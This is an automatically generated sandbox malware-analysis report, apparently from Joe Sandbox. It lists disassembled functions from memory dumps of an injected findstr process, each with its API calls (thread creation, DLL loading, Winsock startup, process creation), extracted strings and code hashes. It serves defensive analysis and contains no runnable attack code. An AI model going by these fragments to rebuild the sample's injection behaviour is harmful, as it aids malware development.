                            Function 006D0B88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 374 6d0b88-6d0bf7 call 6ea000 call 6eaa10 call 6d4530 call 6c1410 call 6e1350 386 6d0bf9-6d0c08 PostThreadMessageW 374->386 387 6d0c17-6d0c1d 374->387 386->387 388 6d0c0a-6d0c14 386->388 388->387
                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 006D0C04
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            • Opcode ID: 7395cc57e385468837c358f834899843730a4a4e23915e94cf0e01754f8305ae
                            • Instruction ID: a6c771c15b4aa7e04cad48e3199384bf9a6a322ffe3148dd786563f63eeb8f77
                            • Opcode Fuzzy Hash: 7395cc57e385468837c358f834899843730a4a4e23915e94cf0e01754f8305ae
                            • Instruction Fuzzy Hash: 7911E5B1D0124C7EEB019AD18C81EFFBB7CDF42794F048169F604A7241D6355F0687A2
                            Function 006D0B90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 389 6d0b90-6d0bf7 call 6ea000 call 6eaa10 call 6d4530 call 6c1410 call 6e1350 401 6d0bf9-6d0c08 PostThreadMessageW 389->401 402 6d0c17-6d0c1d 389->402 401->402 403 6d0c0a-6d0c14 401->403 403->402
                            APIs
                            • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 006D0C04
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: H0840I45$H0840I45
                            • API String ID: 1836367815-3713557624
                            • Opcode ID: 3ae2d356b19159d8fef6f7aa4193f09caa68bff89dd37ce7b51a15b9b76d1daf
                            • Instruction ID: 39ea5955cc919de44548cf7bafe79410f3fa7e05dcc495d936a47ac742d5b322
                            • Opcode Fuzzy Hash: 3ae2d356b19159d8fef6f7aa4193f09caa68bff89dd37ce7b51a15b9b76d1daf
                            • Instruction Fuzzy Hash: 2C0126B2D0120C7AEB01AAE08C81EEFBB7CDF01794F008168FA04B7241E5355F0687B2
                            Function 006E2C20 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 103sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 006E2CDC
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            • Opcode ID: 4f097e5e9a8296fd8cf24a6ac82b790e8d177638811fb9736a50721c4c582627
                            • Instruction ID: ff5c64c23f42dba2096ec725c79978f062b778700e19cb9219d33e18f4f71bb3
                            • Opcode Fuzzy Hash: 4f097e5e9a8296fd8cf24a6ac82b790e8d177638811fb9736a50721c4c582627
                            • Instruction Fuzzy Hash: BE318DB1601705ABC714DF65CC81FEBBBB9AF88740F00861DFA195B245D770BA40CBA4
                            Function 006D1740 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 267networkCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WS2_32(00000202,?), ref: 006D1A44
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Startup
                            • String ID: \
                            • API String ID: 724789610-2967466578
                            • Opcode ID: ea5c701a6aa33e59cd07b67456664e09c8c22bd00f72da4f229167d85d8bd7f4
                            • Instruction ID: dcecff2a56bbf5440dbd6ab4cdd6c41b5e05516f104a8e4ffd6721e927da26a7
                            • Opcode Fuzzy Hash: ea5c701a6aa33e59cd07b67456664e09c8c22bd00f72da4f229167d85d8bd7f4
                            • Instruction Fuzzy Hash: 8391B270E01309BFDB64DFA5C851BEEB7B9AF05704F14412EE508AB341E7B0A645CBA5
                            Function 006D173C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 264networkCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WS2_32(00000202,?), ref: 006D1A44
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Startup
                            • String ID: \
                            • API String ID: 724789610-2967466578
                            • Opcode ID: 35c08f1f2a01243659151c482d90c02034a1ff1e33733ce4d566fb51f4682b16
                            • Instruction ID: 7a6bbe7f197c220fbc28eaabfb22da2a93cd8f900e80e8b7e5bbc7d44d75f3b1
                            • Opcode Fuzzy Hash: 35c08f1f2a01243659151c482d90c02034a1ff1e33733ce4d566fb51f4682b16
                            • Instruction Fuzzy Hash: B09191B0E01309AFDB64DFA4C851BEEB7B6BF05704F14412EE508AB341E7B06645CBA5
                            Function 006E83B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(006D1799,?,006E4B0F,006D1799,006E4727,006E4B0F,?,006D1799,006E4727,00001000,?,?,006E9C50), ref: 006E83EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID: 'Gn
                            • API String ID: 1279760036-3614514410
                            • Opcode ID: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                            • Instruction ID: ad1387110a8fad94e879c1f303d4d55b886535e4bcaf5e342df03f609ab37653
                            • Opcode Fuzzy Hash: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                            • Instruction Fuzzy Hash: D2E065B62002087FD614EE5ADC45FEB73ADEFCA714F008418F908A7242D631BD108AB8
                            Function 006E8400 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 006E843F
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID: 2m
                            • API String ID: 3298025750-977460488
                            • Opcode ID: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                            • Instruction ID: 81e3abd465141ffcf321e8e0880ea1e334ce7f4820f4d985632f7a7f7df396e3
                            • Opcode Fuzzy Hash: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                            • Instruction Fuzzy Hash: D8E065B2204309BBC614EE59DC45FEB73ADEFCA714F00401CFA08A7242C671BA10CAB8
                            Function 006D7C60 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,006D1A80,Gnn,006E4727,?), ref: 006D7C91
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID: 'Gn
                            • API String ID: 2340568224-3614514410
                            • Opcode ID: 75f06d49755477454b4085bd0923f900f3e1d1f16c99366c230924b8cce6adef
                            • Instruction ID: 352291dff12c08b1594a8f63adbbbf5e4a458d21a80c8ceebde2587ba22ca469
                            • Opcode Fuzzy Hash: 75f06d49755477454b4085bd0923f900f3e1d1f16c99366c230924b8cce6adef
                            • Instruction Fuzzy Hash: 1CD05E726443043FF680AAA5DC03F5A328E8B01754F098468F90CDF7C3E962F510416A
                            Function 006DECAD Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 006DECC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize
                            • String ID: @J7<
                            • API String ID: 2538663250-2016760708
                            • Opcode ID: 072e07a5cafbfdd79b57ccefc65c6c0b7f00207ec08500d05d849c139cc27c62
                            • Instruction ID: 34332d728bcf0274c9a6139a6c5a4be38fcdeb5f012a4fab7e760422acfa96b8
                            • Opcode Fuzzy Hash: 072e07a5cafbfdd79b57ccefc65c6c0b7f00207ec08500d05d849c139cc27c62
                            • Instruction Fuzzy Hash: CF3110B5A00609AFDB10DFD9D8809EEB7BAFF88304B108559E505EB314DB75EE45CBA0
                            Function 006DECB0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 006DECC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize
                            • String ID: @J7<
                            • API String ID: 2538663250-2016760708
                            • Opcode ID: 432c1248411d2c46a7a68ea5f9584823acfea610344e747d4852579c4b4f43ea
                            • Instruction ID: 3463c0ee6062138f69878a3c0fb22685327daf4857fedff63cdfd2d042131134
                            • Opcode Fuzzy Hash: 432c1248411d2c46a7a68ea5f9584823acfea610344e747d4852579c4b4f43ea
                            • Instruction Fuzzy Hash: 083121B5A006099FDB10DFD9DC809EEB7BABF88304B108559E505EB314D775EE05CBA0
                            Function 006D45B0 Relevance: 1.6, APIs: 1, Instructions: 104libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 006D45A2
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: e987e27dd546413dec91a427c27747d2880c049e74be4f6c88ff9a713a06d772
                            • Instruction ID: 8136812f84ce7a81594246d4091f08408601d2b76934cff280ea8329dea9772f
                            • Opcode Fuzzy Hash: e987e27dd546413dec91a427c27747d2880c049e74be4f6c88ff9a713a06d772
                            • Instruction Fuzzy Hash: BC217D77D0424AABDB01DA94E882EDAB756EB41708F14415AE805DB343DB32D906C7E5
                            Function 006D19AD Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WS2_32(00000202,?), ref: 006D1A44
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Startup
                            • String ID:
                            • API String ID: 724789610-0
                            • Opcode ID: efe2ae9c840dc0840b97880b9e7c1ad82d77ad3d0c0106f58419868fa5984e9a
                            • Instruction ID: 3800def8cbaf4644e36541146dbefffd4b83ca9ab4e49446ec2409f6ecc994ec
                            • Opcode Fuzzy Hash: efe2ae9c840dc0840b97880b9e7c1ad82d77ad3d0c0106f58419868fa5984e9a
                            • Instruction Fuzzy Hash: 0B11C872D01349AFDB41DBE58C42BEEB7B99F09700F04015AE504F7242E6716A4487B9
                            Function 006D4530 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 006D45A2
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                            • Instruction ID: acd2b3aa8ed8b36c6ff1c33f6cc9d893b805697013fdae01f637b8ac45c371f0
                            • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                            • Instruction Fuzzy Hash: 140100B5D0020DBBDF10DAA5EC46FEEB3B99B54708F004199A91897241F671EA58C791
                            Function 006E8490 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessInternalW.KERNELBASE(006D1030,006D1058,006D0E30,00000000,006D7E13,00000010,006D1058,?,?,00000044,006D1058,00000010,006D7E13,00000000,006D0E30,006D1058), ref: 006E84F0
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            • Opcode ID: 75925144f251256c48620b1f1186ad58dd416a803079d16763daa8f225b138dc
                            • Instruction ID: 643ba7cc9962b67a66ab4cc0ab65ff9ae2ab6a8a6ad5582b32c3d4050e1d7136
                            • Opcode Fuzzy Hash: 75925144f251256c48620b1f1186ad58dd416a803079d16763daa8f225b138dc
                            • Instruction Fuzzy Hash: A001C4B2205208BBCB44DF99DC81EDB77ADEF8C714F408108BA09E3241D630F851CBA4
                            Function 006C97D0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006C9812
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: f881a9c6838bd57fa3c4755ee97b3e458390389975197965264650576da4c448
                            • Instruction ID: d0ac421f37aa33cb2cccdccf33884d88a6e3d09cee34c355d1864ca4e870ee95
                            • Opcode Fuzzy Hash: f881a9c6838bd57fa3c4755ee97b3e458390389975197965264650576da4c448
                            • Instruction Fuzzy Hash: 54F0303334131436D32065AA9C02FAB629DDB82B61F144429F60CEB181D591F40142A9
                            Function 006C97C8 Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006C9812
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 19906642e3035405cd5c830cdc5250707211b6d5a88c3a47cf0cd11cfbee1bcc
                            • Instruction ID: 51336c3b9d71c5b01a2e3dd95493a57350a98e2dfedc18ec0ea87377158447a3
                            • Opcode Fuzzy Hash: 19906642e3035405cd5c830cdc5250707211b6d5a88c3a47cf0cd11cfbee1bcc
                            • Instruction Fuzzy Hash: 82F0E53234030036D33075998C03FEB226DCF82BA1F18451CF618AB1C1D666B80186A8
                            Function 006C9829 Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006C9812
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: ce3695cb378b234aa4aa31d73cf434996e48b3b613c73fbc134275a56649ef51
                            • Instruction ID: c5f464c1316d7fd1402a2d8ab66ae6b0947b20d101772330813e0516eb377611
                            • Opcode Fuzzy Hash: ce3695cb378b234aa4aa31d73cf434996e48b3b613c73fbc134275a56649ef51
                            • Instruction Fuzzy Hash: 30E086733C174026E33165599C03FAF619E9B81B51F38052DF319DF2C2DA95F40202A8
                            Function 006D7E70 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE ref: 006D7E7A
                            Memory Dump Source
                            • Source File: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6c0000_findstr.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                            • Instruction ID: 6f67ebffcf896ff10ef105e6de860be7c3cd5f156e0a57a324309f132ea67637
                            • Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                            • Instruction Fuzzy Hash: F3C08C3122400804EB2005FC7C483E333498BC333CB180ED3F82CDA6F0E1229CA7A001
                            Function 02F82C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c72944faf7503b30ee4be7859a003eddc133f08334fdb38221f51b5a5e2edad1
                            • Instruction ID: b52e874e034fe90f5c7ae3873f321509c760a8f5e4831753ef61dbb734acb4fc
                            • Opcode Fuzzy Hash: c72944faf7503b30ee4be7859a003eddc133f08334fdb38221f51b5a5e2edad1
                            • Instruction Fuzzy Hash: 75B09B71D015C5D5EE11F7604A08717790067D1791F15C061D3034645E4738D1D1E175

                            Non-executed Functions

                            Function 0330B7FA Relevance: 57.8, Strings: 46, Instructions: 250COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3792083516.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3300000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                            • API String ID: 0-3754132690
                            • Opcode ID: fd3712b3bfd487199239d5500132267c023e4877587cfa18c35df2fde8904628
                            • Instruction ID: 13e89a6298a7a0a615e48f95a221888cf40a925487efd08cc73cf2ea82f636fe
                            • Opcode Fuzzy Hash: fd3712b3bfd487199239d5500132267c023e4877587cfa18c35df2fde8904628
                            • Instruction Fuzzy Hash: 22A174F04083948AC7198F58A0652AFFFB5EBC6305F15816DE6E6BB243C37E8905CB95
                            Function 03302D3E Relevance: 20.1, Strings: 16, Instructions: 67COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3792083516.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3300000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: "">7$43 ;$9={r$;&}g$;=<}$>7}c$>;97$>;97$>>3}$ae|g$c`r$c|`r$e|br$e|ga$g|br$}kga
                            • API String ID: 0-3696260499
                            • Opcode ID: ef385a0a1ccb649719418f2f33c95e721cf96fd19a481a83203e0645119b2af0
                            • Instruction ID: c7edac2e5d9fb2446fafe26477dd052a5ac356595b003f79e487bd3f46557200
                            • Opcode Fuzzy Hash: ef385a0a1ccb649719418f2f33c95e721cf96fd19a481a83203e0645119b2af0
                            • Instruction Fuzzy Hash: 593154B590474CEBCB14CF95D681ADEBB71FF08344F908159E8096B384C7758619CF8A
                            Function 02F82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: f3aece3a3bf36df1a25d4ac8cc42d9fe5cdccd000006fe95f75360aa8b239ebb
                            • Instruction ID: e9e363058da3d5bd884f12bbee245893d92d202c8f64728c6ffae722ec52897d
                            • Opcode Fuzzy Hash: f3aece3a3bf36df1a25d4ac8cc42d9fe5cdccd000006fe95f75360aa8b239ebb
                            • Instruction Fuzzy Hash: 8851E8B6F00156BFDF11EB99889097EF7B8BF082807508169EA65D7641D734EE50CBE0
                            Function 02F77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                            Download Yara Rule
                            Strings
                            • Execute=1, xrefs: 02FB4713
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02FB4655
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 02FB4787
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02FB4725
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02FB4742
                            • ExecuteOptions, xrefs: 02FB46A0
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02FB46FC
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            • Opcode ID: 6a8805f0113cc687f5732729ab5f8f6af8ab4c67c5a79fdbef78d61f7b06da82
                            • Instruction ID: ce0304fdc4108c4ad1296f23eace9bfac1bae1051653ece8575dd44306041683
                            • Opcode Fuzzy Hash: 6a8805f0113cc687f5732729ab5f8f6af8ab4c67c5a79fdbef78d61f7b06da82
                            • Instruction Fuzzy Hash: 2D512631A1021DBAEF11BAA4DC95FEAF7B9EF04384F1400AAD705A7181EB71AE45CF54
                            Function 02F8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction ID: 884e13bed912ca0278d54c787fe877dbe4d9454e2441ab52c7c6ee8b0c15bd94
                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction Fuzzy Hash: ED81B170E052499EDF24EE68C891BFEFBB2AF4539CF18425ADA61E72D0C7349841CB54
                            Function 02F6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02FB02BD
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02FB02E7
                            • RTL: Re-Waiting, xrefs: 02FB031E
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            • Opcode ID: 230dcbbc30b24fa9050750148d47451cc9ea62c24fdf5bc2b45fdfb53c994531
                            • Instruction ID: 7016dd89afe52f47fddd7a91e95590a8fcbc0a8f3c3a84d47920151a399664af
                            • Opcode Fuzzy Hash: 230dcbbc30b24fa9050750148d47451cc9ea62c24fdf5bc2b45fdfb53c994531
                            • Instruction Fuzzy Hash: 5BE1DE31A087419FD725CF28D888B6AB7E1FF85394F140A5DF6A68B6E0DB35D844CB42
